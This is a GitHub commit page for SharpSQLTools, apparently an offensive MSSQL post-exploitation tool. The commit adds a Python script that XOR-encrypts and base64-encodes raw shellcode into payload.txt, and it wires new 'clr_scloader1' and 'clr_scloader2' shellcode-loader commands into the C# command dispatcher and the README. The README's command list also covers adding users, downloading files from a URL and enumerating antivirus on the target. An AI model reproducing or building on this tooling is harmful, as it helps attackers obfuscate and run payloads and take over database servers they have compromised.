Skip to content

Commit d0160b3

Browse files
authored
Add files via upload
1 parent 2a55a18 commit d0160b3

4 files changed

Lines changed: 51 additions & 32 deletions

File tree

Python/Encrypt.py

Lines changed: 32 additions & 30 deletions
Original file line numberDiff line numberDiff line change
@@ -1,30 +1,32 @@
1-
#coding:utf-8
2-
#References:https://github.com/evi1ox/MSSQL_BackDoor/blob/master/tools/py_bin_encrypt/EncodeShellcode.py
3-
4-
import sys
5-
import base64
6-
import argparse
7-
8-
9-
def xor(data, key):
10-
l = len(key)
11-
keyAsInt = list(map(ord, key))
12-
return bytes(bytearray((
13-
(data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
14-
)))
15-
16-
if __name__ == '__main__':
17-
parser = argparse.ArgumentParser(description="python3 {0} -f payload.bin -k Evi1oX".format(sys.argv[0]))
18-
parser.add_argument("-f","--file", help="Raw Shellcode File",required=True)
19-
parser.add_argument("-k","--key", help="XOR Encrypted key",required=True)
20-
args = parser.parse_args()
21-
22-
try:
23-
with open(args.file, 'rb') as f:
24-
scBytes = f.read()
25-
xorBytes = xor(scBytes, args.key)
26-
print("XorKey: "+args.key)
27-
print("Result: "+base64.b64encode(xorBytes).decode())
28-
except Exception as e:
29-
print(e)
30-
sys.exit()
1+
#coding:utf-8
2+
#Author:Evi1oX
3+
4+
import sys
5+
import base64
6+
import argparse
7+
8+
9+
def xor(data, key):
10+
l = len(key)
11+
keyAsInt = list(map(ord, key))
12+
return bytes(bytearray((
13+
(data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))
14+
)))
15+
16+
if __name__ == '__main__':
17+
parser = argparse.ArgumentParser(description="python3 {0} -f payload.bin -k Evi1oX".format(sys.argv[0]))
18+
parser.add_argument("-f","--file", help="Raw Shellcode File",required=True)
19+
parser.add_argument("-k","--key", help="XOR Encrypted key",required=True)
20+
args = parser.parse_args()
21+
22+
try:
23+
with open(args.file, 'rb') as f:
24+
scBytes = f.read()
25+
xorBytes = xor(scBytes, args.key)
26+
print("XorKey: "+args.key)
27+
print("Result: "+base64.b64encode(xorBytes).decode())
28+
with open("payload.txt","w") as f:
29+
f.write(base64.b64encode(xorBytes).decode())
30+
except Exception as e:
31+
print(e)
32+
sys.exit()

README.md

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -46,6 +46,8 @@ clr_getav - get anti-virus software on this machin by clr
4646
clr_adduser {user} {pass} - add user by clr
4747
clr_download {url} {path} - download file from url by clr
4848
clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
49+
clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt
50+
clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
4951
exit - terminates the server process (and this session)
5052
5153
```
@@ -199,4 +201,4 @@ https://github.com/blackarrowsec/mssqlproxy
199201

200202
https://github.com/An0nySec/ShadowUser/blob/main/ShadowUser/Program.cs#L235
201203

202-
https://github.com/GhostPack/SharpDump
204+
https://github.com/GhostPack/SharpDump

SharpSQLTools/Program.cs

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -36,6 +36,7 @@ private static void Help()
3636
clr_adduser {user} {pass} - add user by clr
3737
clr_download {url} {path} - download file from url by clr
3838
clr_scloader {code} {key} - Encrypt Shellcode by Encrypt.py (only supports x64 shellcode.bin)
39+
clr_scloader1 {file} {key} - Encrypt Shellcode by Encrypt.py and Upload Payload.txt
3940
clr_scloader2 {remotefile} - Upload Payload.bin to target before Shellcode Loader
4041
exit - terminates the server process (and this session)"
4142
);
@@ -355,6 +356,13 @@ static void interactive(string[] args)
355356
clr_exec(s);
356357
break;
357358
}
359+
case "clr_scloader1":
360+
{
361+
String s = String.Empty;
362+
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
363+
clr_exec(s);
364+
break;
365+
}
358366
case "clr_scloader2":
359367
{
360368
String s = String.Empty;
@@ -510,6 +518,13 @@ static void Noninteractive(string[] args)
510518
clr_exec(s);
511519
break;
512520
}
521+
case "clr_scloader1":
522+
{
523+
String s = String.Empty;
524+
for (int i = 3; i < args.Length; i++) { s += args[i] + " "; }
525+
clr_exec(s);
526+
break;
527+
}
513528
case "clr_scloader2":
514529
{
515530
String s = String.Empty;

SharpSQLTools/Setting.cs

Lines changed: 1 addition & 1 deletion
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)